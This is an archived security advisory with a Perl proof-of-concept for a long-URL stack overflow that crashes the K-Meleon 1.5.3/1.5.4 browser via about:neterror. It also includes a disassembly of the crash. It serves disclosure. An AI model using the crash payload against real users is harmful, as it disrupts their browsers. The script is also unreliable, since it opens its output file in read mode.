exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

K-Meleon For Windows 1.5.3 / 1.5.4 Stack Overflow

K-Meleon For Windows 1.5.3 / 1.5.4 Stack Overflow
Posted Aug 6, 2010
Authored by Lostmon | Site lostmon.blogspot.com

K-Meleon for Windows versions 1.5.3 and 1.5.4 suffer from a long href stack overflow vulnerability.

tags | exploit, denial of service, overflow
systems | windows
SHA-256 | 3d6095abf51ff1ac775313c1738c9e97bd643f2c84b5de5164bd64f51eef9ef5

K-Meleon For Windows 1.5.3 / 1.5.4 Stack Overflow

Change Mirror Download
############################################
K-Meleon for windows about:neterror Stack Overflow DoS
Vendor URL:http://kmeleon.sourceforge.net/
Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Vendor notified:Yes exploit available: YES
############################################

K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also
used by Firefox. K-Meleon is free, open source software released under
the GNU General Public License and is designed specifically for
Microsoft Windows (Win32) operating systems.

K-Meleon is prone vulnerable to crashing with a very long URL...
Internal web pages like about:neterror does not limit the amount of
chars that a user put in 'c' 'd' params and them if we compose a
malformed url the browser can be chash easy.This issue is exploitable
via web links like <a href="very long url">click here</a> or via
window.location.replace('very long url') or similar vectors.

#################
Versions Tested
#################

I have tested this issue in win xp sp3 and a windows 7 fully pached.

Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)

windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)

############
References
############

Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:

########################
ASM code stack overflow
########################

ScreenShot => http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s1600/k-meleon.png

CPU Disasm
Address Hex dump Command
0043CB3F CC INT3
0043CB40 /$ 3D 00100000 CMP EAX,1000
0043CB45 |. 73 0E JNB SHORT 0043CB55
0043CB47 |. F7D8 NEG EAX
0043CB49 |. 03C4 ADD EAX,ESP
0043CB4B |. 83C0 04 ADD EAX,4
0043CB4E |. 8500 TEST DWORD PTR DS:[EAX],EAX
0043CB50 |. 94 XCHG EAX,ESP
0043CB51 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
0043CB53 |. 50 PUSH EAX
0043CB54 |. C3 RETN
0043CB55 |> 51 PUSH ECX
0043CB56 |. 8D4C24 08 LEA ECX,[ARG.1]
0043CB5A |> 81E9 00100000 /SUB ECX,1000
0043CB60 |. 2D 00100000 |SUB EAX,1000
0043CB65 |. 8501 |TEST DWORD PTR DS:[ECX],EAX <== Stack overflow
0043CB67 |. 3D 00100000 |CMP EAX,1000
0043CB6C |.^ 73 EC \JNB SHORT 0043CB5A
0043CB6E |. 2BC8 SUB ECX,EAX
0043CB70 |. 8BC4 MOV EAX,ESP
0043CB72 |. 8501 TEST DWORD PTR DS:[ECX],EAX
0043CB74 |. 8BE1 MOV ESP,ECX
0043CB76 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]
0043CB78 |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]
0043CB7B |. 50 PUSH EAX
0043CB7C \. C3 RETN
0043CB7D CC INT3
0043CB7E CC INT3




################
#Proof Of Concept
################

#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Usage: $0 <archivo.html>\n";

}

$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x
1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";

$datos = $cabecera . $payload . $fin;

open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Related Links
##############

vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close